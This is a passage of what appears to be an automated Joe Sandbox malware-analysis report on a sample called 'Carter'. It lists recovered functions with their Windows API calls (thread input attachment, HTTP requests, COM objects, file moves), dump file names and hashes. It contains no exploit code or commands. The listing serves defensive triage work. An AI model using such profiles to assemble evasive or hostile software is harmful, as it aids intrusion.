                                                                            • GetDlgCtrlID.USER32 ref: 002C9CC0
                                                                            • GetParent.USER32 ref: 002C9CDC
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002C9CDF
                                                                            • GetDlgCtrlID.USER32(?), ref: 002C9CE8
                                                                            • GetParent.USER32(?), ref: 002C9D04
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 002C9D07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: 2db9bdd90bc2bd8b3fb303c7a15b9e6009d6917477bbfbcbc010349067c67735
                                                                            • Instruction ID: 6228863cb219373b4c98497259760b45e47a9ed89bc7ea6263b751c464fd80b0
                                                                            • Opcode Fuzzy Hash: 2db9bdd90bc2bd8b3fb303c7a15b9e6009d6917477bbfbcbc010349067c67735
                                                                            • Instruction Fuzzy Hash: C721B075911108ABDF05AB60CC95FFEBBA9EF99300F100216F95193191DB754979DF20
                                                                            Function 002E8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 002E8FC1
                                                                            • CoInitialize.OLE32(00000000), ref: 002E8FEE
                                                                            • CoUninitialize.OLE32 ref: 002E8FF8
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 002E90F8
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 002E9225
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00303BDC), ref: 002E9259
                                                                            • CoGetObject.OLE32(?,00000000,00303BDC,?), ref: 002E927C
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 002E928F
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002E930F
                                                                            • VariantClear.OLEAUT32(?), ref: 002E931F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2395222682-0
                                                                            • Opcode ID: 1a7bbf174f160baacbef662a3c318dc80ed56ad8b47e2ae55d317adacc4fa02a
                                                                            • Instruction ID: e79edffa60163a0268893634ce7d29447a12ad3285685af6459de3819cf29688
                                                                            • Opcode Fuzzy Hash: 1a7bbf174f160baacbef662a3c318dc80ed56ad8b47e2ae55d317adacc4fa02a
                                                                            • Instruction Fuzzy Hash: 0FC15571218345AFD700DF6AC884A2BB7E9FF89308F40491EF98A9B251DB71ED45CB52
                                                                            Function 002D19CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 002D19EF
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A03
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 002D1A0A
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A19
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 002D1A2B
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A44
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A56
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A9B
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1AB0
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1ABB
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: 40577f69a358a6b42cd6a14be8bc0c1fe87ca7f32cb0a0b7e51168d4553002a7
                                                                            • Instruction ID: 9c3838b21274e3c1da1766b61921036d2e758d28621e7ddab63943ed995e6ffe
                                                                            • Opcode Fuzzy Hash: 40577f69a358a6b42cd6a14be8bc0c1fe87ca7f32cb0a0b7e51168d4553002a7
                                                                            • Instruction Fuzzy Hash: 4531D0B1622309BFEB16DF14ED88FA977AEEB54315F104117F800C6690DBB89D60CB60
                                                                            Function 002AC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 0027260D
                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00272617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0027262C
                                                                            • GetStockObject.GDI32(00000005), ref: 00272634
                                                                            • GetClientRect.USER32(?), ref: 002AC0FC
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 002AC113
                                                                            • GetWindowDC.USER32(?), ref: 002AC11F
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 002AC12E
                                                                            • ReleaseDC.USER32(?,00000000), ref: 002AC140
                                                                            • GetSysColor.USER32(00000005), ref: 002AC15E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 3430376129-0
                                                                            • Opcode ID: 370d35e793cc0bc7c5d3865836b8da453953155f93b85d93f83edbb93c1b5ce4
                                                                            • Instruction ID: d25ad88460e58d48f7da664e132313a524eaa0278c082857a8ba4cb9e8132bb0
                                                                            • Opcode Fuzzy Hash: 370d35e793cc0bc7c5d3865836b8da453953155f93b85d93f83edbb93c1b5ce4
                                                                            • Instruction Fuzzy Hash: E0118131515205FFDB665FB4EC58BE97B7AEB09321F104222FA69950E1CF710961EF10
                                                                            Function 0027AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0027ADE1
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 0027AE80
                                                                            • UnregisterHotKey.USER32(?), ref: 0027AFD7
                                                                            • DestroyWindow.USER32(?), ref: 002B2F64
                                                                            • FreeLibrary.KERNEL32(?), ref: 002B2FC9
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002B2FF6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: bff26c50f27fc8e4e253ebe8875a1edd398974b18cc842cd2fc5f1855c61e96e
                                                                            • Instruction ID: c4e92c4f21b6b8b053ce93582fdb92ffd6cb96493201e563bfc771aafffbbbe3
                                                                            • Opcode Fuzzy Hash: bff26c50f27fc8e4e253ebe8875a1edd398974b18cc842cd2fc5f1855c61e96e
                                                                            • Instruction Fuzzy Hash: 4FA15B34722212CFCB29EF14C495B69F364BF44750F1482ADE90AAB691DB31AD36CF91
                                                                            Function 002CAD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,002CB13A), ref: 002CB078
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 3555792229-1603158881
                                                                            • Opcode ID: a6ee620d1dfe2654f17481f36b77024338dc7720b430378a309ff8bee6d4c360
                                                                            • Instruction ID: 4f2e6d899071c84966a2d99119256dddfee31aa18672772fabcb102b87c51480
                                                                            • Opcode Fuzzy Hash: a6ee620d1dfe2654f17481f36b77024338dc7720b430378a309ff8bee6d4c360
                                                                            • Instruction Fuzzy Hash: E591A17052051AABCB19EF60C482FEEFB75BF04304F14821DE85AA7191DF3169B9CBA1
                                                                            Function 002731F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 0027327E
                                                                              • Part of subcall function 0027218F: GetClientRect.USER32(?,?), ref: 002721B8
                                                                              • Part of subcall function 0027218F: GetWindowRect.USER32(?,?), ref: 002721F9
                                                                              • Part of subcall function 0027218F: ScreenToClient.USER32(?,?), ref: 00272221
                                                                            • GetDC.USER32 ref: 002AD073
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002AD086
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002AD094
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002AD0A9
                                                                            • ReleaseDC.USER32(?,00000000), ref: 002AD0B1
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002AD13C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: ec91d2e373d7c325032ace7f13dfb437aeb758237a475af346897af7eb566793
                                                                            • Instruction ID: 3adb0cc6f6661fb9563721362687773290e9c64a45b26314da555697a4e8774d
                                                                            • Opcode Fuzzy Hash: ec91d2e373d7c325032ace7f13dfb437aeb758237a475af346897af7eb566793
                                                                            • Instruction Fuzzy Hash: A971D53042420ADFCF25CF64C885ABA7BB5FF4A360F14426AED5A5A166CB318D61DF60
                                                                            Function 002FC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                              • Part of subcall function 00272714: GetCursorPos.USER32(?), ref: 00272727
                                                                              • Part of subcall function 00272714: ScreenToClient.USER32(003377B0,?), ref: 00272744
                                                                              • Part of subcall function 00272714: GetAsyncKeyState.USER32(00000001), ref: 00272769
                                                                              • Part of subcall function 00272714: GetAsyncKeyState.USER32(00000002), ref: 00272777
                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 002FC69C
                                                                            • ImageList_EndDrag.COMCTL32 ref: 002FC6A2
                                                                            • ReleaseCapture.USER32 ref: 002FC6A8
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 002FC752
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002FC765
                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 002FC847
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                            • API String ID: 1924731296-2107944366
                                                                            • Opcode ID: be49403ec6e7086f75c2364db669025d480fd5b957983c48abe2dc297af6753f
                                                                            • Instruction ID: a3c809cce7de7b52cb3761b8c8860dd80715629a852972c56f57490a77e1e7bd
                                                                            • Opcode Fuzzy Hash: be49403ec6e7086f75c2364db669025d480fd5b957983c48abe2dc297af6753f
                                                                            • Instruction Fuzzy Hash: 3051CF70118309AFD715EF14CC9AFAAB7E9EB84350F10852DF6958B2E1CB30A925CF52
                                                                            Function 002E20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002E211C
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002E2148
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002E218A
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002E219F
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002E21AC
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002E21DC
                                                                            • InternetCloseHandle.WININET(00000000), ref: 002E2223
                                                                              • Part of subcall function 002E2B4F: GetLastError.KERNEL32(?,?,002E1EE3,00000000,00000000,00000001), ref: 002E2B64
                                                                              • Part of subcall function 002E2B4F: SetEvent.KERNEL32(?,?,002E1EE3,00000000,00000000,00000001), ref: 002E2B79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 2603140658-3916222277
                                                                            • Opcode ID: 848f1eca738771b62e2accdec1ac1816f3c62a039d970fb39a29a9ecc4b96b9c
                                                                            • Instruction ID: f262ef55c5cffc5630c98c1f7dc8eefe51077ca836519178d4a180c371ab7a2d
                                                                            • Opcode Fuzzy Hash: 848f1eca738771b62e2accdec1ac1816f3c62a039d970fb39a29a9ecc4b96b9c
                                                                            • Instruction Fuzzy Hash: 6D41D0B1591249FFEB069F51CC89FBB7BACEF08710F40401AFE069A141D7B49E588BA0
                                                                            Function 002E9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00300980), ref: 002E9412
                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00300980), ref: 002E9446
                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002E95C0
                                                                            • SysFreeString.OLEAUT32(?), ref: 002E95EA
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                            • String ID:
                                                                            • API String ID: 560350794-0
                                                                            • Opcode ID: d616b307e377f85d2ce8c36fde0f1b3c3fabf5e724daf199bc5f90854ffdcc6e
                                                                            • Instruction ID: f0dd54a5da08b84510d45a0e861a7f85c9aee7b923e068f3c60d17bd8ff72bdf
                                                                            • Opcode Fuzzy Hash: d616b307e377f85d2ce8c36fde0f1b3c3fabf5e724daf199bc5f90854ffdcc6e
                                                                            • Instruction Fuzzy Hash: EEF13971A20209EFCB14DF95C884EAEB7B9FF49314F50805AF50AAB250DB71AE95CF50
                                                                            Function 002D527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002D3B8A,?), ref: 002D4BE0
                                                                              • Part of subcall function 002D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002D3B8A,?), ref: 002D4BF9
                                                                              • Part of subcall function 002D4FEC: GetFileAttributesW.KERNEL32(?,002D3BFE), ref: 002D4FED
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 002D52FB
                                                                            • _wcscmp.LIBCMT ref: 002D5315
                                                                            • MoveFileW.KERNEL32(?,?), ref: 002D5330
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 793581249-0
                                                                            • Opcode ID: bde85633c1c77593c4cb2a9fde4a6ff3c3dfacb32e2bbb99ee1ec436d4c5f1ba
                                                                            • Instruction ID: 85a26f0a5194bf0274b2824e8da782f7567afc7dfc361cad3dd06f83372360ad
                                                                            • Opcode Fuzzy Hash: bde85633c1c77593c4cb2a9fde4a6ff3c3dfacb32e2bbb99ee1ec436d4c5f1ba
                                                                            • Instruction Fuzzy Hash: CD5164B20187959BC764EBA0D8819DBB3EC9F84300F50092FF589D3192EF74A699CB56
                                                                            Function 002F8C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002F8D24
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: c436a920f0708709c534dac6caa8750d742449d288672f46b93378ece9dbe7c3
                                                                            • Instruction ID: 9c2a98feac2efdb28ccdb2d3e61e7ef6e08b4d80de8ffb1cce948da27707f07d
                                                                            • Opcode Fuzzy Hash: c436a920f0708709c534dac6caa8750d742449d288672f46b93378ece9dbe7c3
                                                                            • Instruction Fuzzy Hash: B651913066120DAFEB259F24CC89B79FB65EB05790F144522F715DA1E1CF71A9A08A50
                                                                            Function 00272F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 002AC638
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002AC65A
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002AC672
                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 002AC690
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002AC6B1
                                                                            • DestroyIcon.USER32(00000000), ref: 002AC6C0
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002AC6DD
                                                                            • DestroyIcon.USER32(?), ref: 002AC6EC
                                                                              • Part of subcall function 002FAAD4: DeleteObject.GDI32(00000000), ref: 002FAB0D
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 2819616528-0
                                                                            • Opcode ID: 6941f84ff12e5de3d78804d71daab10e1f873bb6dd71b0f008589e85320df54b
                                                                            • Instruction ID: 374b1bf82d5e82c4b8fb0ed04d19f2c1684e8074df628cfe35855309782999ec
                                                                            • Opcode Fuzzy Hash: 6941f84ff12e5de3d78804d71daab10e1f873bb6dd71b0f008589e85320df54b
                                                                            • Instruction Fuzzy Hash: 1D519C7062020AEFDB24DF24CC95BAA77B9EB44710F208519F946E76A0DB70ECA0DF50
                                                                            Function 002CA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002CB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002CB54D
                                                                              • Part of subcall function 002CB52D: GetCurrentThreadId.KERNEL32 ref: 002CB554
                                                                              • Part of subcall function 002CB52D: AttachThreadInput.USER32(00000000,?,002CA23B,?,00000001), ref: 002CB55B
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 002CA246
